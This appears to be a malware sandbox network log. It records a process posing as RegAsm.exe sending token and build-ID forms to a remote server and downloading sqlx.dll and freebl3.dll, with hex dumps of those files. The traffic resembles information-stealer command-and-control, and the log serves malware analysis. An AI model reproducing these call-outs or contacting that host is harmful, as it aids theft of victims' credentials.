                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:08 UTC326OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 5713
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:08 UTC5713OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------HDBGHDHCGHCAAKEBKECBCont
                                                                              2024-05-17 16:06:10 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.54971295.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:09 UTC241OUTGET /sqlx.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:11 UTC248INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:10 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 2459136
                                                                              Last-Modified: Sun, 12 May 2024 18:14:05 GMT
                                                                              Connection: close
                                                                              ETag: "664106ed-258600"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-17 16:06:11 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                              Data Ascii: X~e!*FW|>|L1146
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                              Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                              Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                              Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                              Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                              Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                              Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                              Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                              2024-05-17 16:06:11 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                              Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.54971695.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:14 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 829
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:14 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------KFBFCAFCBKFIEBFHIDBACont
                                                                              2024-05-17 16:06:15 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.54971895.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:14 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDA
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:14 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------BKJJJDHDGDAAKECAKJDACont
                                                                              2024-05-17 16:06:16 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.54971995.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:17 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:17 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------HDBGHDHCGHCAAKEBKECBCont
                                                                              2024-05-17 16:06:18 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.54972095.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:18 UTC220OUTGET /freebl3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:19 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:18 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 685392
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-a7550"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-17 16:06:19 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                              2024-05-17 16:06:19 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                              Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
